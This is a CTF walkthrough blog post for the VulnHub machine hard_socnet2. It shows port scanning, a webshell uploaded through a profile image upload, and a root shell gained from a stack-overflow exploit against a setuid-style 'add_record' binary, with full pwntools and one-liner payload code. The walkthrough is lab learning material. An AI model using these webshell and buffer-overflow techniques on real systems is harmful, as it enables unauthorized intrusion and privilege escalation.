vulnhub5

This post was last updated 225 days ago; the information in it may no longer be current.

VM download:

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

Information gathering

Step one is information gathering. As usual, I run fscan and nmap together.

fscan for a quick overall survey

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.120.141

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.120.141 is alive
[*] Icmp alive hosts len is: 1
192.168.120.141:22 open
192.168.120.141:80 open
192.168.120.141:8000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.120.141:8000 code:501 len:216    title:Error response
[*] WebTitle: http://192.168.120.141    code:200 len:10609  title:Social Network

nmap full-port scan

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap --min-rate 10000 -p- 192.168.120.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:15 CST
Nmap scan report for 192.168.120.141
Host is up (0.000033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 00:0C:29:F4:0E:58 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds

nmap service and OS detection on the open ports

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap -sT -sV -O -p 22,80,8000 192.168.120.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:16 CST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 19:16 (0:00:12 remaining)
Nmap scan report for 192.168.120.141
Host is up (0.00013s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)
MAC Address: 00:0C:29:F4:0E:58 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds

getshell

Two web services are exposed: one served by Apache2 and one by Python.

The natural next step is to browse them, starting with the service on port 80.

image

It is a user login/registration page. There is no admin e-mail address to work with, so the only option is to register an account and check whether the logged-in application has any vulnerabilities.

First, register an account:

image

After logging in, do a quick round of vulnerability testing:

image

There is XSS (not useful here, though).

image

Test for other vulnerabilities:

image

There is a file upload feature; a quick test:

image

Upload a webshell; it appears to succeed, so try connecting to it:

image

The uploaded file is found at: http://192.168.120.141/data/images/profiles/3.php

image

The connection succeeds.

Privilege escalation 1

Privesc:

image

That CVE still works...

Privilege escalation 2

But this does not seem to be the intended solution; the intended route requires pwn.

So it is time to learn pwn on the spot.

After getting a shell, in /home/user we can see

image

a service that is started with root privileges.

Download it to Kali and debug it with pwndbg (install it if needed: pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy (github.com)).

First, check which protections are enabled with checksec:

┌──(kali㉿kali)-[~/Desktop]
└─$ checksec add_record 
[*] '/home/kali/Desktop/add_record'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments

Apart from the stack being executable, every protection is off.

Start pwndbg:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# gdb -q add_record
pwndbg: loaded 147 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.                                
pwndbg: created $rebase, $ida GDB functions (can be used with print/break)                                                                  
Reading symbols from add_record...
(No debugging symbols found in add_record)
------- tip of the day (disable with set show-tips off) -------
Pwndbg context displays where the program branches to thanks to emulating few instructions into the future. You can disable this with set emulate off which may also speed up debugging                            
pwndbg> 

First, find which input has the stack overflow (stack overflows are the only thing I know how to do).

Prepare a long string of A's for the test:

┌──(kali㉿kali)-[~/Desktop]
└─$ python -c "print('A'*1000)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Run the program with r:

image

After the input, the program simply exits with an error, so this field is judged not to have a stack overflow; move on to the next field:

image

It also exits normally; keep testing down the list until the last field, Explain:

pwndbg> r
Starting program: /home/kali/Desktop/add_record 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".                                                                  
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
Employee Name(char): a
Years worked(int): 1
Salary(int): 1
Ever got in trouble? 1 (yes) or 0 (no): 1
Explain: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────
*EAX  0xffffd27e ◂— 0x41414141 ('AAAA')
*EBX  0x41414141 ('AAAA')
*ECX  0xffffd6c0 ◂— 'AAAA'
*EDX  0xffffd662 ◂— 'AAAA'
*EDI  0xffffd340 ◂— 0x41414141 ('AAAA')
*ESI  0x80488d0 (__libc_csu_init) ◂— push ebp
*EBP  0x41414141 ('AAAA')
*ESP  0xffffd2c0 ◂— 0x41414141 ('AAAA')
*EIP  0x41414141 ('AAAA')
──────────────────[ DISASM / i386 / set emulate on ]───────────────────
Invalid address 0x41414141

───────────────────────────────[ STACK ]───────────────────────────────
00:0000│ esp 0xffffd2c0 ◂— 0x41414141 ('AAAA')
... ↓        7 skipped
─────────────────────────────[ BACKTRACE ]─────────────────────────────
0 0x41414141
   1 0x41414141
   2 0x41414141
   3 0x41414141
   4 0x41414141
   5 0x41414141
   6 0x41414141
   7 0x41414141
───────────────────────────────────────────────────────────────────────

Here the saved return address on the stack is overwritten, which means there is very likely an exploitable vulnerability.

How do we exploit it?

Opening the program in IDA shows

image

that the program contains a backdoor function that simply calls system('/bin/sh').

So overwriting EIP with the address of backdoor is enough to execute it and get a /bin/sh.

The next step is to work out which position overwrites EIP, because we do not know which of the 1000 A's landed on the saved EIP;

we only know that it is definitely overwritten:

image

So we use an MSF-generated non-repeating pattern to locate it:

msf-pattern_create -l 1000

image

The screenshot shows that 0Ac1 overwrote EIP, so look up how many characters precede 0Ac1:

msf-pattern_offset -q 0Ac1

image

The answer is 62, so we pad with 62 bytes.

Start writing the exploit:
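As an added illustration (not part of the original writeup), here is a small Python reimplementation of the msf-pattern_create / msf-pattern_offset logic. It shows why the token 0Ac1 maps to offset 62, and also accepts the raw 32-bit EIP value as pwndbg prints it, converting it back to the little-endian byte string before searching:

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length: int) -> str:
    """Build the Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0Ab1...

    Every 3-byte triplet is unique, so any 4-byte window identifies one
    position in the string. Supports patterns up to 26*26*10*3 bytes.
    """
    chunks = []
    total = 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    raise ValueError("requested length exceeds the cyclic pattern space")


def pattern_offset(query, length: int = 1000):
    """Return the index of `query` in the pattern, or None if absent.

    `query` may be the 4-char window seen on the stack ("0Ac1") or the
    integer register value pwndbg shows (0x31634130): in the latter case
    the value is repacked little-endian, since that is the byte order in
    which the overwritten saved EIP was read from memory.
    """
    if isinstance(query, int):
        query = struct.pack("<I", query).decode("ascii", errors="replace")
    pos = pattern_create(length).find(query)
    return None if pos == -1 else pos


if __name__ == "__main__":
    # Constructed demo values: the writeup's EIP window and its integer form.
    print(pattern_offset("0Ac1"))        # 62, matching msf-pattern_offset
    print(pattern_offset(0x31634130))    # 62 again, from the register value
    print(pattern_offset("ZZZZ"))        # None: window not from the pattern
```

Control-hijack crashes showing a value that is *not* in the pattern (for example the 0x41414141 seen earlier) are a hint that the pattern was sent to the wrong field or truncated.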

image

The screenshot shows the address of backdoor is 0x08048676,

and the junk padding is 62 bytes.

Write the exploit:

from pwn import *

# local run of the binary under pwntools
p = process("./add_record")
backdoor = 0x8048676  # address of the backdoor function, taken from IDA

# answer the first four prompts (name, years, salary, trouble) with dummy values
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')

# 62 bytes of padding reach the saved return address; p32 packs the
# backdoor address little-endian for this i386 binary
payload = b'a'*62 + p32(backdoor)
p.sendline(payload)
p.interactive()

But that script only works against a local process and cannot be used against the remote environment, so use this instead (Python 2 syntax, matching the interpreter on the target):

python -c "import struct;print('aa\n1\n1\n1\n' + 'A'*62 + struct.pack('I',0x08048676))" > payload

Then run

cat payload - | ./add_record

and you get a shell, running as root. The trailing dash tells cat to read its own standard input after the payload file, so the pipe into ./add_record stays open and the program (and the shell it spawns) keeps reading commands from our terminal instead of hitting EOF.

image

Pwn learning references

【星盟安全】PWN complete course, from beginner to expert, the most accessible CTF series, continuously updated (bilibili)

pwn study: locating the overflow position (CSDN blog)
